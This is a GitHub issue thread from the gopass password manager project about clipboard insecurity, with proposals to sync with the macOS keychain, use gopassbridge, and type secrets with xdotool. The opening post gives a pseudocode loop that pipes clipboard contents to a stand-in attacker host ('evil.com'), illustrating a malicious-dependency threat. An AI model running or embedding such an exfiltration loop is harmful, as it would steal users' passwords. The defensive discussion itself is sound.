### ISSUE TITLE
The clipboard is not secure

### ISSUE THREAD

**Issue by vemv** [gopasspw/gopass#1014]
Hi! Awesome project, considering adoption. I'm a `pass` user. At this point I don't know if to double-down on my `pass` approach with gopass, or to leave those behind somehow.

The issue is that clipboards are a weak place to store confidential information. It is trivial to create a malicious npm/rubygems/maven/brew/... dependency (or transitive dependency!) that runs something like the following:

```
while true:
  pbpaste | curl evil.com
```

Recent events https://github.com/dominictarr/event-stream/issues/116 have proved that such scenarios aren't fiction. One can easily imagine similar variations: https://hackernoon.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5

https://github.com/gopasspw/gopassbridge seems a great step in the direction of clipboard avoidance. But what about terminal usage?

Ideally there would be something like a native iTerm2 or macOS integration. Obviously, a fancy GUI integration is costly and might be even unfeasible.

I've taken a look at iTerm2's password manager, which is integrated with the macOS keychain. It seems to work fine.

For each password managed by iTerm, a Keychain entry like the following is created:

![image](https://user-images.githubusercontent.com/1162994/49918382-4117c000-fea3-11e8-8bd7-ab72399b929a.png)

So, at least for now, I would consider creating a functionality that keeps gopass and the keychain in sync. One effectively can programatically create passwords that can be consumed by iTerm2:

```
# add API:
security add-generic-password -s iTerm2  -a gmail -w $THE_PASSWORD
# ...now the password will show up in iTerm2's password manager. 
# fetch API:
security find-generic-password -s iTerm2 -a gmail -w
```

Of course, one would have to study the implications of this approach first - not sure if a rogue npm package might leverage iTerm2's keychain access.

Do you see an actionable item for gopass here? I am aware that I'm posing a generic problem, but it also is true that gopass users are security-conscious, so it isn't ideal to forget the fact that clipboards aren't secure.

Cheers - Victor

**Comment by dewey** [comment]
Is this really a solvable problem? If you don’t run an airgapped machine just for pasting passwords this will always be a problem.

And at some point you’ll have to paste password into a browser window, editor that’s not a terminal or an application or am I missing something?

**Comment by vemv** [comment]
iTerm2's password manager doesn't use the clipboard, and neither does https://github.com/gopasspw/gopassbridge , which uses native messaging instead.

> editor that’s not a terminal

Leaving aside that one shouldn't paste secrets into code, one always could use an editor (like vim, emacs, nano, micro) and still leverage iTerm2's password management facility. I just tried it out.

**Comment by metalmatze** [comment]
I guess this is one of the reasons why pass and gopass delete the secrets from the clipboard after a certain time. You can also decrease the timeout's duration, default is at 45 seconds. 
`gopass config cliptimeout 10` will set the timeout to 10 seconds.

I don't think we can get rid of copying the passwords to clipboards entirely, though we are definitely open to supporting new ways of communicating the secrets in the system, like the gopassbridge.

**Comment by dragon788** [comment]
One example of bypassing the clipboard is given in the dmenu/rofi example in the documentation, though note that using `xdotool` only works under Xorg/X11 displays, but it will "type" the password directly instead of using the clipboard where a secret might be snooped by another process (though if somebody has a keylogger on your system you are sunk for clipboard or typing).

For terminal based applications you can use subshells and text interpolation depending on how long you are caching the PIN/passphrase for your GPG keys. `xfreerdp /v:hostname.domain /u:"$(gopass -o windows/desktop username)" /p:"$(gopass -o windows/desktop)"` assuming you have a `username: YourUsername` line in that file.
